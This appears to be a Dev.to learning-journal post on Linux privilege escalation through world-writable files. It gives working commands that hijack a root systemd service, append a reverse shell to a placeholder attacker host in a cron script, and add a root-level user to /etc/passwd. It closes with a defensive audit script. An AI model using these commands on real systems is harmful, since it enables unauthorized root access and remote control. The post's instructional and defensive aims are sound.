Day 29: Writable File Exploitation — Turning 'Bad Permissions' into Root Shells 🕵️‍♂️

Published: March 23, 2026 at 12:35 PM EDT
Source: Dev.to

The “Writable‑to‑Root” Pipeline

1. The Systemd Service Hijack

I audited a custom service file in /etc/systemd/system/app.service.

Flaw: The ExecStart pointed to /opt/app.py, which was world‑writable (-rwxrwxrwx).

Exploit:

echo 'import os; os.system("/bin/bash")' > /opt/app.py

Trigger: systemctl restart app.
Since the service manager (systemd) runs as root, the injected Bash shell spawns with full root privileges.

Automation: I checked /etc/crontab and found a cleanup script running every minute.

Exploit (append reverse shell):

echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/cleanup.sh

Result: Within 60 seconds, the system automatically pushed a root shell to my listener.

/etc/passwd (The Nuclear Option)

In rare, critical misconfigurations where /etc/passwd is world‑writable:

Exploit: Generate a password hash for a new user.

openssl passwd -1 mypassword

Injection: Append the following line to /etc/passwd (replace $hash with the generated hash).

hacker:$hash:0:0:root:/root:/bin/bash

Result: su hacker provides an immediate root session without needing the actual root password.

“Gold Mine” Discovery Command

find / -writable -type f 2>/dev/null | grep -v "/proc"

Typical writable locations uncovered:

  • /opt/ (custom applications)
  • /usr/local/bin/ (custom scripts)
  • /etc/systemd/system/ (service configs)
  • /etc/cron* (scheduled tasks)
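
From the defender's side, the same three findings can be checked directly instead of grepping a full-filesystem listing. The script below is an added example, not code from the original post: it resolves the files that systemd units and system crontabs actually execute and reports any that are world-writable, along with /etc/passwd and the config files themselves. The function names and the optional root-prefix argument are assumptions of this sketch.

```shell
#!/bin/sh
# Added defensive example; function names and the optional root-prefix argument
# are assumptions of this sketch, not taken from the original post.

# List absolute paths referenced by systemd ExecStart= lines and system crontabs.
# Units that set User= do not run as root; review those hits separately.
exec_targets() {
    _root=${1-}
    {
        # Drop the key and any systemd prefix characters (-@:+!) before the path
        grep -hs '^ExecStart=' "$_root"/etc/systemd/system/*.service |
            sed -E 's/^ExecStart=[-@:+!]*//'
        # Crontab entries, skipping comment lines
        grep -hsv '^[[:space:]]*#' "$_root"/etc/crontab "$_root"/etc/cron.d/*
    } | tr -s ' \t' '\n\n' | grep '^/' | sort -u
}

# Report which of those targets, and which config files, are world-writable.
audit_world_writable() {
    _root=${1-}
    {
        printf '%s\n' /etc/passwd /etc/crontab
        for u in "$_root"/etc/systemd/system/*.service; do
            printf '%s\n' "${u#"$_root"}"
        done
        exec_targets "$_root"
    } | sort -u | while IFS= read -r p; do
        # -L tests the link target's mode rather than the symlink's own
        hit=$(find -L "$_root$p" -maxdepth 0 -type f -perm -0002 2>/dev/null)
        if [ -n "$hit" ]; then
            printf 'WORLD-WRITABLE %s\n' "$p"
        fi
    done
}

# No argument audits the live system; pass a directory to audit a mounted image.
audit_world_writable "${1-}"
```

Any hit is fixed by restoring root ownership and removing the write bit for others (for example `chown root:root` and `chmod 755` on scripts, `chmod 644` on /etc/passwd and unit files).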

Follow my journey: #1HourADayJourney